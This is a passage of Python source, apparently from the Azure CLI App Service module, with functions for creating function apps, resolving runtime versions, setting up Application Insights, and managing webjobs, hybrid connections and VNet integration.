supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
.format(os_string, ', '.join(supported_runtimes)))
runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
functions_version,
runtime_version,
is_linux)
if not runtime_version_json:
supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
_get_supported_runtime_versions_functionapp(runtime_json,
functions_version)))
if runtime_version:
if runtime == 'dotnet':
raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
.format(runtime_version, functions_version))
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions-version {}. Supported versions are: {}.'
.format(runtime_version,
runtime,
functions_version,
', '.join(supported_runtime_versions)))
# if runtime_version was not specified, then that runtime is not supported for that functions version
raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
'--functions-version {}'
.format(runtime, functions_version))
if runtime == 'dotnet':
logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
'--functions-version. Dotnet version will be %s for this function app.',
runtime_version_json[KEYS.DISPLAY_VERSION])
if runtime_version_json[KEYS.IS_DEPRECATED]:
logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
'Please update your command to use a more recent version. For a list of supported '
'--runtime-versions, run \"az functionapp create -h\"',
runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION])
site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
app_settings_json = {}
# ensure that app insights is created if not disabled
runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_json.items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# adding app settings
for app_setting, value in app_settings_json.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or windows consumption, we need these app settings
is_windows_consumption = consumption_plan_location is not None and not is_linux
if is_plan_elastic_premium(cmd, plan_info) or is_windows_consumption:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
create_app_insights = True
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
            logger.warning('Error while trying to create and configure an Application Insights component for the '
                           'Function App. Please use the Azure Portal to create and configure it, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
if is_linux:
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
KEYS = FUNCTIONS_STACKS_API_KEYS()
matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
if matching_runtime_json:
return matching_runtime_json[0]
return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
supported_versions_list = []
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
supported_versions_list.append(runtime_version_json)
return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
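    '''
    Return the stack entry matching the requested runtime_version (if supported by the
    selected Functions extension version); otherwise fall back to the highest default
    version supported by that extension version.
    '''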
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
if runtime_version:
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
return runtime_version_json
return None
# find the matching default runtime version
supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
default_version_json = {}
default_version = 0.0
for current_runtime_version_json in supported_versions_list:
if current_runtime_version_json[KEYS.IS_DEFAULT]:
current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION],
is_linux)
if not default_version_json or default_version < current_version:
default_version_json = current_runtime_version_json
default_version = current_version
return default_version_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
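# Added note (not part of the original source): _get_extension_version_functionapp('3') yields '~3',
# while a missing functions_version falls back to the '~2' extension bundle.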
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
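# Illustrative sketch (added comment): the reduce-based helper above turns camelCase keys into
# snake_case, e.g.
#   _convert_camel_to_snake_case('linuxFxVersion')  ->  'linux_fx_version'
#   _convert_camel_to_snake_case('alwaysOn')        ->  'always_on'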
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
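# Hedged example (added comment): assuming the Windows/Linux regexes capture the numeric part of
# values such as '~3' (Windows) or 'python|3.7' (Linux), this helper would yield 3.0 and 3.7
# respectively, falling back to float(version_string) or 0 when nothing matches.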
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
    # We emit this success message as a warning so as not to interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
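# Added comment for clarity: the returned value has the standard shape
#   DefaultEndpointsProtocol=https;EndpointSuffix=<suffix>;AccountName=<account>;AccountKey=<key0>
# where the suffix comes from the active cloud (e.g. core.windows.net for the public cloud).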
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
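# Added note: the loop above polls the Kudu deployment status endpoint every 2 seconds; in the
# returned payload a 'status' of 3 is treated as a failed deployment and 4 as success, and anything
# else after the timeout window raises the "still on-going" error.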
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
if n.name == namespace:
hy_co_id = n.id
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, hc, slot)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
    # ensures the key type provided is valid
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
    # reformats the vnet entry, removing unnecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.create_or_update(vnet_resource_group, vnet, subnet,
subnet_parameters=subnetObj)
id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
subnet_resource_id = id_subnet.id
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
if slot is None:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
swiftVnet)
else:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
swiftVnet, slot)
    # reformats the vnet entry, removing unnecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False):
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == 'linux'
if runtime and html:
raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')
if runtime:
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime)
if not match:
if _is_linux:
raise CLIError("Linux runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
raise CLIError("Windows runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise CLIError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(rg_name, plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
